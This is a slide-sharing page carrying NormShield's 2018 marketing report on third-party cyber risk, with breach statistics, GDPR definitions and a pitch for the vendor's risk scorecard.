HOW TO MEASURE WHAT HACKERS KNOW ABOUT YOUHOW TO MEASURE WHAT HACKERS KNOW ABOUT YOU
HOW TO MEASURE WHAT HACKERS KNOW ABOUT YOU
 
Major 3rd-Party Data Breaches Of 2018
Major 3rd-Party Data Breaches Of 2018Major 3rd-Party Data Breaches Of 2018
Major 3rd-Party Data Breaches Of 2018
 
Normshield 2018 Airlines Phishing Report
Normshield 2018 Airlines Phishing ReportNormshield 2018 Airlines Phishing Report
Normshield 2018 Airlines Phishing Report
 
Are There Any Domains Impersonating Your Company For Phishing?
Are There Any Domains Impersonating Your Company For Phishing?Are There Any Domains Impersonating Your Company For Phishing?
Are There Any Domains Impersonating Your Company For Phishing?
 
NormShield Cyber Risk Rating October 18
NormShield Cyber Risk Rating October 18NormShield Cyber Risk Rating October 18
NormShield Cyber Risk Rating October 18
 
NormShield Supply Chain Risk Management Infographic
NormShield Supply Chain Risk Management InfographicNormShield Supply Chain Risk Management Infographic
NormShield Supply Chain Risk Management Infographic
 
Third-Party Risk in Regulations
Third-Party Risk in RegulationsThird-Party Risk in Regulations
Third-Party Risk in Regulations
 
NormShield Crypto Currency Report 2018
NormShield Crypto Currency Report 2018NormShield Crypto Currency Report 2018
NormShield Crypto Currency Report 2018
 
NormShield 2018 Cyber Security Risk Brief
NormShield 2018 Cyber Security Risk BriefNormShield 2018 Cyber Security Risk Brief
NormShield 2018 Cyber Security Risk Brief
 

Recently uploaded

Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
Bhaskar Mitra
 
"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi
Fwdays
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Thierry Lestable
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
Product School
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
CatarinaPereira64715
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Jeffrey Haguewood
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
Paul Groth
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Product School
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 

Recently uploaded (20)

Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
 
"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi"Impact of front-end architecture on development cost", Viktor Turskyi
"Impact of front-end architecture on development cost", Viktor Turskyi
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 

3rd Part Cyber Risk Report - 2018

  • 1. 1 THE WEAKEST LINK MAY NOT BE IN YOUR SYSTEM Phone +1 (571) 335-0222 Email info@normshield.com 8200 Greensboro Dr. Ste 900 McLean, VA 22102 NormShield 3rd Party Cyber Risk Report
  • 2. www.normshield.com 2 NormShield 3rd Party Cyber Risk Report The weakest link may not be in your system Matt, CISO of a large company, comes to office on Friday. He is a very successful Chief of Information Security Office and he is very confident of capabilities of his team. They handle all vulnerabilities inside their own system, continuously scan and monitor their system, they use cutting-edge security tools such as firewalls, WAFs, IDS/IPS, and Data Leak Protection technologies. The cyber security awareness of the employees is quite high and they do everything to avoid phishing-type attacks. The possibility that something goes wrong is very low. However, that Friday morning, when Matt looks at online news, he shockingly discovers that many of their client information is leaked. He starts to investigate the situation and finds nothing in their own system. But later, he finds out that the leak is originated from a 3rd party, a data management company which manages emails of large companies.
  • 3. www.normshield.com 3 NormShield 3rd Party Cyber Risk Report Recently, we have heard similar stories about breaches because of 3rd parties such as vendors, subsidiaries, web hosting companies, law firm partners, firms in supply chain, etc. Large companies such as financial institutions, e-commerce companies have been improving their cyber security system for external or even internal attacks. They can internally identify vulnerabilities of their own system by monitoring and/or scanning tools and take necessary precautions. However, all these efforts might be for nothing if 3rd party cyber risk is unknown. 3rd party risk management and data governance are growing concerns. It is not surprising that, very recently, the revised version of the U.S. National Institute of Standards and Technology’s Cybersecurity Framework (NIST) now includes supply chain cyber risk management1. 1 https://www.wsj.com/articles/amid-national-security-warnings-nist-adds-supply-chain-security-to-cyber- framework-1524175900
  • 4. www.normshield.com 4 NormShield 3rd Party Cyber Risk Report What is 3rd Party? 3rd parties include broad range of companies you directly worked with such as data management companies, law firms, e-mail providers, web hosting companies, subsidiaries, vendors, sub-contractors, basically any company some of whose employees have somewhat access to your system or your data. However, third party cyber risk is not limited to these companies. Any external software or hardware that you use for your system also poses a cyber risk. Even the JavaScript that is added to your website for analytics may cause a breach by collection information of people that visited your website. Considering some recent hacks by putting backdoors to well-known software, such as CCleaner in 2017, the definition of 3rd party should not be limited to only the companies that you work. Even IoT devices can be considered as a third party and can be source of a breach. Very recently a casino was hacked through its Internet-connected thermometer in an aquarium in the lobby of the casino.
  • 5. www.normshield.com 5 NormShield 3rd Party Cyber Risk Report GDPR perspective on third party The upcoming European Union’s General Data Protection Regulation (GDPR) has the terms third-party data processor and controller. As the name suggests, a third-party data processor is an entity that processes personally identifiable information (PII) on behalf of a controller. Basically, it can be e-mail service providers, customer relationship management services, etc. A controller is defined by the GDPR as an entity that determines how that data will be processed and for what reason. All companies work with third-party data processors have to ensure that these third-parties comply or intent to comply the upcoming GDPR rules.
  • 6. www.normshield.com 6 NormShield 3rd Party Cyber Risk Report Recent breaches caused by 3rd parties The figure below shows recent breaches/incidents caused by third parties. As seen from these breaches/incidents, the third party that caused a breach might be a law firm (usually the weakest link), an accounting firm, or even a firm that handles HVAC jobs; or it might be companies that provides web hosting, data management, e-mail services, etc.
  • 7. www.normshield.com 7 NormShield 3rd Party Cyber Risk Report How much do you trust the cyber security measurements of 3rd-party companies? A recent survey conducted by Ponemon Institute reveals that 56% have experienced a 3rd-party breach in 2017, which is an 7% increase compared to previous year2 . Another survey conducted by Deloitte in 2016 gives more depressive numbers, reporting that 87% of organizations have experienced a disruptive incident with third parties in the last 2-3 years. Another research in 2016, sourced by Soha Systems, reports that 63% of all breaches were related to third parties. The fines paid because of the breaches are as quite large as more than 7 million $US per breach. For instance, Target paid more than $116 million in civil settlements related to its 2013 breach caused by an HVAC company. The total cost to company because of this breach exceeded $290 million. With upcoming GDPR, we shall see higher fines for each breach related to EU citizens. The GDPR fines can go up to 20 million Euros or 4% of annual global turnover (whichever is the highest). 2 https://www.opus.com/ponemon/
  • 8. www.normshield.com 8 NormShield 3rd Party Cyber Risk Report How much do you know about third parties? The Ponemon Institute report shows that 57% of companies do not know if they share sensitive information with third parties and they don’t know either if the third parties’ security measurements would prevent a breach. As a result, only 17% feel that they are highly capable of mitigating third party risk and 60% feel unprepared to check or verify their third parties.
  • 9. www.normshield.com 9 NormShield 3rd Party Cyber Risk Report How to assess 3rd party risk? Many companies either do not have any assessment on cyber risk of third parties or use old-school questionnaire methodology (sending a bunch of questions for third party to answer and assessing the risk based on the answer). First of all, questionnaire-based assessment is very time consuming (even though there are some online tools for it) and answers are not reliable. Even if we assume that answers are correct and we collect the results quickly, there might be some cyber risks that are invisible to third party. This type of “hidden” risks can only be detected by gathering cyber threat intelligence and evaluating the risk. Fortunately, there are several platforms that gather third party data and provide a risk score or security rating for companies related to a certain company. NormShield, BitSight, Security Scorecard, UpGuard, and RiskRecon are top players in the third-party risk scoring business. They all provide risk scores or security rating for any company added as a third-party and assess its cyber risk and how it affects the main company. This type of information can also be used for mergers and acquisitions.
  • 10. www.normshield.com 10 NormShield 3rd Party Cyber Risk Report Using NormShield Cyber Risk Scorecard to assess third parties? As an example, we explain how to use NormShield Cyber Risk Scorecard to assess the third parties for a company. In NormShield Cyber Risk Scorecard, you can create an ecosystem that will includes the main company and all the third- parties to be added. More than one ecosystem can be created such as an ecosystem including the companies/branches owned by the main company or an ecosystem for third-parties or you can even create an ecosystem which includes only law firms that you work with. Then, a third-party can easily be added by only typing its website. NormShield first discover the digital footprint of the third party (domains, subdomains, IP addresses, DNS Records, services, social media accounts, ASN, e-mails, company info, etc.) to see what hackers see on this third party. Then NormShield evaluates the cyber risk by its proprietary algorithm on 20 different categories and how the cyber risk of this third party affects the overall ecosystem. Below is a list of some categories taken into consideration; Main company then can contact to third company and discuss the issues found by NormShield Cyber Risk Scorecard and remediate and mitigate the risk.
  • 11. www.normshield.com 11 NormShield 3rd Party Cyber Risk Report About NormShield We provide Cyber Risk Scorecard for companies just like FICO score. Cyber security is on every Board’s agenda, and the average total cost of a data breach has risen to $4 million (Ponemon/IBM). NormShield Cyber Risk Scorecards provide the information necessary to protect business from cyber-attacks. The scorecards provide a letter grade and a drill down into the data for each risk category so that remediation of vulnerabilities can be prioritized. Unified Threat & Vulnerability Orchestration Platform and Cyber Risk Scorecard. To learn your company’s risk score, please visit https://www.normshield.com/ and click on Learn Now. www.normshield.com 1 (571) 335 02 22 info@normshield.com NormShield HQ 8200 Greensboro Drive Suite 900 McLean, VA 22102